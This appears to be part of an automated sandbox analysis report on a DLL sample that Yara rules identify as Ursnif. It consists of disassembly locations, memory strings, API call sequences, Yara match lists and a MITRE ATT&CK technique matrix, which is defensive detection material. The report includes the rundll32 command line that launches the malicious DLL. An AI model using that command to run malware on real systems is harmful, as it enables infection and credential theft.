                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00BF0397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00BF03F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00BF0469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00970397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_009703F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0097009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_00970469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00CA0469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00CA009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00CA03F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00CA0397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00C90469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00C9009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00C903F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00C90397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00A8009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00A80469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00A80397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00A803F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_03370397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_033703F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_03370469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_0337009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_033B009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_033B03F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_033B0397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 20_2_033B0469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_043F009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_043F0397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_043F03F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 26_2_043F0469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 27_2_00BC009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 27_2_00BC0397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 27_2_00BC03F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 27_2_00BC0469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 33_2_001E009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 33_2_001E0397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 33_2_001E03F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 33_2_001E0469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 35_2_030E0469 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 35_2_030E009C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 35_2_030E0397 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 35_2_030E03F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmp | Binary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000002.647599368.0000000001100000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.650368021.0000000003110000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.650410553.0000000003460000.00000002.00020000.sdmp, rundll32.exe, 0000001F.00000002.651017968.00000000032A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00EC269C cpuid
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0040102F GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00401850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00EC269C RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree

                      Stealing of Sensitive Information:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
                      Source: Yara match | File source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      Yara detected Ursnif
                      Source: Yara match | File source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.375609486.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.468055904.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364525253.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.364645701.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 1132, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3528, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 572, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6420, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5852, type: MEMORYSTR
                      Source: Yara match | File source: 12.2.rundll32.exe.3380000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.rundll32.exe.d50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.rundll32.exe.4420000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.regsvr32.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.rundll32.exe.c70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.regsvr32.exe.5e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.ee0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 33.2.rundll32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.rundll32.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 20.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.rundll32.exe.34b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 17.2.rundll32.exe.e90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 35.2.rundll32.exe.30f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.rundll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.e70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 9.2.rundll32.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.regsvr32.exe.6a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.rundll32.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.rundll32.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.647248023.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000026.00000002.420703816.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.369842357.0000000004420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000029.00000002.429260721.0000000000B90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002A.00000002.446457237.0000000002FF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000009.00000002.304746856.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.644375086.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000002B.00000002.458755671.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.325365679.0000000003380000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.358824695.0000000000A10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.413264520.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.330683030.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000002.298453588.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000014.00000002.342607248.00000000033C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.290124643.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.346644009.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.365645310.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.645252474.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

Techniques per tactic column (a trailing number after a technique name is carried over from the original matrix):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Windows Management Instrumentation 2, Native API 2, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
Persistence: DLL Side-Loading 1, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection 12, DLL Side-Loading 1, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading 1, Virtualization/Sandbox Evasion 1, Process Injection 12, Obfuscated Files or Information 1, Regsvr32 1, Rundll32 1, Software Packing 1, DLL Side-Loading 1
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery 1, Query Registry 1, Virtualization/Sandbox Evasion 1, Process Discovery 2, Account Discovery 1, System Owner/User Discovery 1, File and Directory Discovery 2, System Information Discovery 13
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
Collection: Archive Collected Data 1, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
